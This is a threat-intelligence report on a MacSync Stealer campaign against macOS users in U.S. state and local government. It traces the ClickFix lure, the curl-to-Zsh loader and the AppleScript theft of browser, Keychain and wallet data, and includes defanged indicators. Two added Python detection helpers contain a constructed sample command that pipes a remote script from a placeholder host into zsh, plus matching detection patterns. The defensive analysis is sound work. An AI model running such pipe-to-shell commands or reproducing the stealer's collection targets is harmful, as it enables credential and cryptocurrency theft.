MacSync Stealer Campaign Impacting U.S. SLTT macOS Users

The Center for Internet Security® (CIS®) Cyber Threat Intelligence (CTI) team identified an ongoing MacSync Stealer campaign impacting macOS users in U.S. State, Local, Tribal, and Territorial (SLTT) government organizations through the ClickFix social engineering technique.

Following a submission from a U.S. SLTT organization, CIS CTI identified a broader opportunistic campaign using fake CAPTCHAs and a ClickFix lure delivered through search engine optimization (SEO) poisoning, with payload capabilities designed to maximize the types of impacted web browsers.

CIS CTI assesses it is highly likely threat actors will continue leveraging ClickFix variants to impact U.S. SLTTs throughout 2026 due to the technique’s scalability, ease of implementation, and ability to compromise multiple victims quickly.

A Brief Note on MacSync Stealer

MacSync Stealer is a macOS infostealer that malware developers lease to other cybercriminals in a Malware as a Service (MaaS) operation. Cybercriminals leverage SEO poisoning to steer victims to malicious websites that use fake ClickFix CAPTCHAs for payload delivery.

The threat actors behind MacSync Stealer continuously update the malware in response to defensive countermeasures and changing operational conditions.

Evolution at Work in a MacSync Stealer Campaign

At the time of publication, Sophos X-Ops tracked three distinct MacSync Stealer campaigns, and it observed a deliberate evolution in delivery mechanism, lure themes, and payload architecture across each iteration.

The third of these tracked campaigns started in February 2026. It includes the incident analyzed in this report and represents a significant evolution in payload architecture. While the ClickFix social engineering core of the attack is retained, the malware developers replaced native Mach-O binary delivery with a multistage Loader as a Service (LaaS) model using shell-based loaders, API key-gated command and control (C2) infrastructure, dynamic AppleScript payloads, and aggressive in-memory execution, as reported by CloudSEK. Sophos X-Ops assessed that this architectural shift was a deliberate adaptation to increasing macOS operating system and security tool restrictions that had reduced the effectiveness of binary-based delivery.

Technical Analysis of the Campaign

CIS CTI's analysis of this campaign began when a member of the Multi-State Information Sharing and Analysis Center® (MS-ISAC®) submitted a MacSync Stealer sample from a confirmed infection. The sample included a Zsh shell script and an AppleScript payload, which enabled the team to reconstruct the attack’s kill chain.

This incident began when the victim was socially engineered into executing a malicious Terminal command after being redirected from a search result for a free e-Book download. Rather than delivering the requested document, the malicious search result, elevated through SEO poisoning, redirected the victim to a fake CAPTCHA page hosted at hxxp://filegrowthlabs[.]com/s3/?c=AA-0uWlVgQUAHYwCAFVTOQASAAAAAACP, as shown in Figure 1.

Figure 1: Fake CAPTCHA & ClickFix technique

The page instructs the victim to open the Terminal and paste a malicious Base64-encoded command, shown below in Figure 2.

Figure 2: Base64 ClickFix command

When decoded, the command instructs the Terminal to display the message "Installing package please wait..." while silently executing a curl command that retrieves a remote Zsh shell script from hxxp://mansfieldpediatrics[.]com/curl/b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0 and pipes it directly into Zsh for immediate execution. The C2 domain impersonates a pediatric medical practice, and the /curl/ bootstrap endpoint path uses a 64-character hexadecimal authentication token that functions as both a victim correlation identifier and a mechanism to restrict payload execution in sandbox environments, per Sophos X-Ops. CIS CTI identified that the /s3/ path in the victim's infection URL directly matches the Build Tag s3 embedded in the malware's own self-identification metadata, confirming this URL functions as the dedicated landing page for the s3 affiliate build within the MacSync MaaS operation.
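The following triage helper is an added example (not code from CIS, Sophos X-Ops, or any other source cited in this report) for analysts who receive a pasted ClickFix command. It decodes any embedded Base64 layer and flags the three indicators the report describes: a remote script piped straight into a shell, a /curl/ bootstrap path carrying a 64-character hexadecimal token, and the campaign API key quoted in the next section. The sample command, its host, and its all-zero token are constructed placeholders.

```python
import base64
import re

# Campaign fingerprint quoted in the report: the API key hardcoded in the Zsh loader.
MACSYNC_API_KEY = "5190ef1733183a0dc63fb623357f56d6"

# Heuristics for ClickFix-style Terminal commands: a remote download piped straight
# into a shell, and a /curl/<64-hex token> bootstrap path like the one the loader uses.
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|\n]*\|\s*(?:zsh|bash|sh)\b")
TOKEN_ENDPOINT = re.compile(r"/curl/\s*[0-9a-f]{64}\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_embedded_base64(text):
    """Return every base64 run in the pasted text that decodes to printable text."""
    decoded = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            layer = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if layer.replace("\n", "").replace("\t", "").isprintable():
            decoded.append(layer)
    return decoded

def triage_clickfix_command(pasted):
    """Scan the pasted command and each decoded base64 layer for the report's indicators."""
    findings = set()
    for layer in [pasted] + decode_embedded_base64(pasted):
        if PIPE_TO_SHELL.search(layer):
            findings.add("remote-script-piped-to-shell")
        if TOKEN_ENDPOINT.search(layer):
            findings.add("token-gated-curl-bootstrap-endpoint")
        if MACSYNC_API_KEY in layer:
            findings.add("macsync-campaign-api-key")
    return sorted(findings)

# Constructed sample shaped like the report's description; the host and the all-zero
# token are placeholders, not indicators from the campaign.
SAMPLE_PLAINTEXT = ('echo "Installing package please wait..."; '
                    "curl -fsSL http://placeholder.invalid/curl/" + "0" * 64 + " | zsh")
SAMPLE_PASTE = ("echo " + base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode()
                + " | base64 -d | zsh")

if __name__ == "__main__":
    print(triage_clickfix_command(SAMPLE_PASTE))
```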

During analysis, a critical C2 infrastructure link was identified. Sophos X-Ops published a deobfuscated script excerpt showing the hardcoded API key value 5190ef1733183a0dc63fb623357f56d6 alongside a different C2 domain, houstongaragedoorinstallers[.]com, in a separate MacSync Stealer sample from the same campaign period. This API key is identical to the value hardcoded in the Zsh shell script downloaded to the MS-ISAC victim’s system, confirming that the same MaaS threat actor is rotating C2 domains while maintaining a common authentication key across deployments. This key functions as a persistent campaign fingerprint; any file, URL, or domain in threat intelligence platforms containing this value can be attributed to the same MacSync MaaS infrastructure.

CIS CTI also identified that the AppleScript payload writes a hardcoded victim IP address into the info file it creates within the staging directory alongside system profiler output, username, and collected password. This indicates the C2 server is injecting victim-specific metadata into the payload at the time of delivery, providing further evidence that payload generation is dynamic per victim rather than static.

Inside the Campaign's Kill Chain

Once downloaded and executed, the Zsh script immediately detaches from the Terminal and begins running silently in the background. After establishing background execution, the script authenticates to the C2 server using its hardcoded API key and authentication token, and it then retrieves the Stage 2 AppleScript payload.

Notably, if the victim's system password was already obtained prior to this request, the script includes it in the request, suggesting the C2 uses the password to tailor or pre-configure the Stage 2 payload on a per-victim basis prior to delivery. Upon delivery, the AppleScript payload is passed directly into macOS's native osascript interpreter and executed entirely in memory. This approach leverages a signed, Apple-native executable as a defense-evasion technique to bypass endpoint detection rules.

The AppleScript begins execution by forcibly terminating the Terminal application to suppress visible shell activity. It then identifies the current username and creates a randomly named staging directory at /tmp/sync[7-digit-random]/ for data collection.

Next, the payload attempts to obtain the victim's macOS account password, which is required for decrypting Keychain items and accessing protected data. If the account has no password set, the script proceeds without user interaction. If a password is required, the payload displays a deceptive System Preferences-style authentication dialog using the legitimate macOS system icon and the prompt: "Required Application Helper. Please enter password for continue." The dialog offers no cancel option and loops indefinitely until the correct password is entered.

Once the AppleScript has the access it needs, it collects the data and compiles it into an archive at /tmp/osalogging.zip. The victim in this case reported encountering this fake prompt and seeing the message: "Your Mac does not support this application. Try reinstalling or downloading the version for your system," which the malware presents after data collection completes to mask suspicious behavior, as noted by CloudSEK.

Once the AppleScript finishes and the archive is detected, the Zsh shell script exfiltrates the file in 10 MB segments via HTTP PUT requests to the C2 server. To ensure delivery, the script will conduct up to eight retry attempts utilizing an incremental backoff strategy. Sophos X-Ops notes all evidence is deleted after successful exfiltration of the archive.
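Two detection checks derived from the kill chain above, written as an added example rather than code from CIS or the cited vendors: a path filter for the /tmp/sync[7-digit]/ staging directory and the /tmp/osalogging.zip archive, and a proxy-log heuristic for repeated HTTP PUT uploads of roughly 10 MB from one client to one host. The log line format, hosts, and URLs are constructed assumptions, and the "info" file name is taken from the earlier description of the staging directory.

```python
import re

# Host artifacts named in the report: the per-infection staging directory
# /tmp/sync<7 random digits>/ and the collection archive /tmp/osalogging.zip.
STAGING_DIR = re.compile(r"^/tmp/sync\d{7}(?:/|$)")
ARCHIVE_PATH = "/tmp/osalogging.zip"
# The report describes exfiltration as HTTP PUT requests in 10 MB segments.
SEGMENT_BYTES = 10 * 1024 * 1024

def find_host_artifacts(paths):
    """Return the paths that match the staging directory or archive described above."""
    return [p for p in paths if STAGING_DIR.match(p) or p == ARCHIVE_PATH]

def find_segmented_put_uploads(log_lines, min_requests=2, tolerance=0.05):
    """Flag (client, host) pairs that sent several PUTs, at least one near 10 MB."""
    per_pair = {}
    for line in log_lines:
        parts = line.split()
        if len(parts) != 6 or parts[2] != "PUT":
            continue
        _ts, client, _method, url, _status, body = parts
        host = url.split("/")[2]
        body = int(body)
        if body > SEGMENT_BYTES * (1 + tolerance):
            continue  # a single oversized upload is not the segmented pattern
        entry = per_pair.setdefault((client, host), {"n": 0, "full": False})
        entry["n"] += 1
        if abs(body - SEGMENT_BYTES) <= SEGMENT_BYTES * tolerance:
            entry["full"] = True
    return sorted(k for k, e in per_pair.items() if e["n"] >= min_requests and e["full"])

# Constructed samples: a file listing and proxy log lines of the form
# "<timestamp> <client> <method> <url> <status> <request_bytes>". Hosts and URLs are
# placeholders, not indicators from the campaign.
SAMPLE_PATHS = ["/tmp/sync4821907/info", "/tmp/osalogging.zip", "/tmp/syncthing/config"]
SAMPLE_LOG = [
    "2026-03-02T10:00:01Z 10.0.0.5 GET http://intranet.example/index.html 200 5120",
    "2026-03-02T10:00:09Z 10.0.0.5 PUT http://c2-placeholder.invalid/u?part=1 200 10485760",
    "2026-03-02T10:00:20Z 10.0.0.5 PUT http://c2-placeholder.invalid/u?part=2 200 10485760",
    "2026-03-02T10:00:31Z 10.0.0.5 PUT http://c2-placeholder.invalid/u?part=3 200 3145728",
    "2026-03-02T10:05:00Z 10.0.0.7 PUT http://backup.example/files/report.pdf 201 2097152",
]

if __name__ == "__main__":
    print(find_host_artifacts(SAMPLE_PATHS))
    print(find_segmented_put_uploads(SAMPLE_LOG))
```

Because the report notes that the loader deletes its evidence after a successful upload, the path check is most useful on a live host or a snapshot taken while collection is still under way; the proxy-log heuristic does not depend on host artifacts surviving.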

AppleScript Infostealer Payload Analysis

The AppleScript infostealer payload implements nine distinct data collection modules targeting browsers, credentials, cryptocurrency wallets, system data, and sensitive files. The following sections detail the modules most relevant to U.S. SLTT organizations.

Browser and Credential Theft

The payload targets 13 Chromium-based browsers and four Gecko-based browsers simultaneously. For each detected browser profile, the payload copies the Cookies, Login Data, Web Data, Local Extension Settings, and IndexedDB directories.

Separately from credential collection, the payload executes a dedicated second pass over the same browser profiles specifically targeting over 80 browser extension IDs associated with cryptocurrency wallet extensions, extracting Local Extension Settings and IndexedDB data for each. This is implemented as a distinct module from general browser credential theft, indicating deliberate and targeted wallet-specific collection logic.

System Data Theft

Beyond browser data, the payload harvests the macOS Keychain database, SSH private keys, AWS credentials, Kubernetes configuration files, and other cloud provider key material from the user profile directory. The Telegram Desktop application's local data directory is copied in its entirety, as reported by Imperva, enabling account takeover without requiring the victim's password or bypassing two-factor authentication. The payload also copies shell history files, which frequently contain SSH connection commands exposing internal server addresses and usernames, API tokens entered inline during command-line operations, database connection strings, and cloud provider Command Line Interface (CLI) commands revealing infrastructure details, suggesting this collection module is a potential corporate network pivot capability beyond the direct impact to the victim user.

Additionally, the payload collects Safari browser data, including cookies, autofill form values, and browsing history, as well as the victim's Apple Notes database and files matching common sensitive extensions across the victim's Desktop, Documents, and Downloads directories. The payload adapts its file collection behavior based on the permission level it obtains on the victim system, using more aggressive collection methods if Full Disk Access is available.

Cryptocurrency Wallet Theft and Ledger Hardware Wallet Trojanization

The MacSync Stealer payload includes extensive cryptocurrency-theft functionality, targeting more than 80 browser-based wallet extensions and over 20 desktop wallet applications to extract stored data and credentials, per Hive Pro. Its most critical capability is the trojanization of installed Ledger hardware-wallet applications, in which the malware replaces the application's core files with malicious versions downloaded from the C2. Sophos X-Ops' analysis of the modified Ledger application showed it contains injected code that captures entered seed phrases and exfiltrates them directly to a separate attacker-controlled endpoint entirely distinct from the primary C2 infrastructure. This backdoor persists even after MacSync Stealer itself is removed, allowing seed-phrase theft to occur the next time the victim opens the compromised Ledger application, as shared by CloudSEK.

If either Ledger application was opened following the estimated infection window, the seed phrases associated with any wallets accessed through those applications should be treated as compromised regardless of whether MacSync Stealer itself has been removed, as the backdoored application will continue to silently exfiltrate seed phrases on each subsequent launch.

Counter macOS Threats through Collective Cyber Defense

CIS CTI recommends U.S. SLTTs join the MS-ISAC, a community dedicated to the Collective Cyber Defense of U.S. SLTTs. MS-ISAC members received early reporting on the MacSync Stealer malware campaign, including over 1,000 indicators of compromise (IOCs) disseminated through our Indicator Sharing Program. Additionally, members can take advantage of proactive web security through the Malicious Domain Blocking and Reporting (MDBR) service, which blocked over 2.5 million DNS requests related to the MacSync Stealer malware campaign at the time of publication. Finally, the CIS CTI team provided members with a more detailed report on the MacSync Stealer campaign, including IOCs and recommendations. This information is intended to provide actionable threat intelligence that directly supports proactive Collective Cyber Defense in the U.S. SLTT community along with informed decision-making.
